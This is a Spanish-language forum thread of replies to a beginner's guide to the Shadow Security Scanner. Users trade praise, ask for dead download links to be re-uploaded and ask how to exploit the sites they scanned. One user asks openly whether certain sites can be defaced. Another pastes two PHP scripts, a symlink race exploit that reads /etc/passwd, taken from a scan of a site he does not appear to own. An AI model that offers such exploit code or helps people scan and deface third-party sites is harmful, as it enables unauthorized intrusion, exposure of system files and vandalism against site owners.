Manual Para El SSS , Shadow Security Scanner [Escencial para NewBies] By OzX

[OzX]

[Coolsniper]

[arquimedes]

muy buen manual para los novatos OzX, pero ay q decir que muxas veces el exploit que te dan para el bug no es el correcto.

Tambien decir q para aquellos q no les guste la censurado  , en linux ay un programa, que yo personalmente creo q s el mejor scanner de vulnerabilidades, es nessus, tambien existe para windows pero creo que ya esta en su version comercial.
Nessus a parte de ser una herramienta muy pontente, permite al usuaria crea sus propios plugins para scannear 

[MaestroNinja]

gracias, genial

pero... y si en audits no nos sale nada?
que recurso usar?

[hitlerita]

exelente guia Ozx siempre la sarpas con tus guias

adios

[Dark Julius Belmont]

no se que paso escanee una pagina y solo me salireron 2 vulnerabilidades estaban en verde (LE HIZE SCAN COMLPETO)

eran estas:

WEB SERVERS - THE LIST OF EMAIL
WEB SERVERS - THE LIST OF SCRIPT


que hago ahora??

[x-logan]

oye ya no esta el programa en rapidshared, lo podias volver a subir por favor

gracias

[shadow123]

  No puedo bajar el programa para escanear la web el link me lleva a otro lado alguin me puede dar otro plis......

Saludos.

[darknessfeatsunny]

  como siempre OZX grande!!! 

Un saludo

[AcidBurN(lp)]

Muy buena OzX ; solo tengo q aprenderme lo de los scripts y ya estoy

[AcidBurN(lp)]

Ya tenia q salir algun novato como yo a preguntar asi q mejor q sea yo XD.

Asi q por ejemplo a mi en una web q conosco le di el scan y tiene como 10 de los audit en color rojo ( o sea Risk : High), buscando( ya q no todos t dan los codigos) encontre algunos como este:

Código:

script1.php
<?
   symlink("a/a/a/a/a/a/", "dummy");
   symlink("dummy/../../../../../../etc/passwd", "xxx");
   unlink("dummy");
   while (1) {
        symlink(".", "dummy");
        unlink("dummy");
   }
?>

script2.php
<?
while (1) {
        print    @file_get_contents("xxx");
}
?>

Hice todo segun lo explicado y me tira muchos errores a la hora de hacer el,por ejemplo,  "gcc exploit.c" en el simbolo de sistema.Y asi no solo con este sino con todos los codigos q encuentre.

Si la explicacion requiere mucho tiempo por q tendria q aprender algun lenguaje solo diganme eso XD, q yo tambien tendria q ponerme en eso. PEro si es un problema chico y me lo pueden explicar gracias.

EDITADO: lei mejor el manual de compilacion en C y me di cuenta q no me habia fijado en eso asi q perdon XD


EDITADO 2: ALGUN COMPILER DE PHP jeje es lo unico en lo q encuentro codigos :S

['Oryon']

[DR3K14N]

el manual es la ostias esta tela bien explicado asias Ozx 

[vampirochilensis]

ta wenisimo el manual man, pero podrias poner nuevamente el link de descarga por q no funca, actualice varias veces y no pasa na de na man

= se agradece....

[ciro_hxc]

puedes subir el soft de nuevo se te agradece por el aporte

[federinho]

ta wenisimo el manual man, pero podrias poner nuevamente el link de descarga por q no funca, actualice varias veces y no pasa na de na man

= se agradece....

aqui les dejo la respectiva version:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion


Atte: Federinho!

[nekro23]

no se que paso escanee una pagina y solo me salireron 2 vulnerabilidades estaban en verde (LE HIZE SCAN COMLPETO)

eran estas:

WEB SERVERS - THE LIST OF EMAIL
WEB SERVERS - THE LIST OF SCRIPT


que hago ahora??

me pasa lo mismo escaneo una web piczo y  me salen vulnerabilidades en verde nivel de riezgo bajo

son imposibles d defacear esas webs??

[Dr.SysCrack]

Oye men podrias subir de nuevo el programa ya que me aparece como que esta removido si no es mucha molestia

salu2

lo espero gracias

[mistico78]

Es una lastima que el link este muerto

[reipol16]

El link esta caido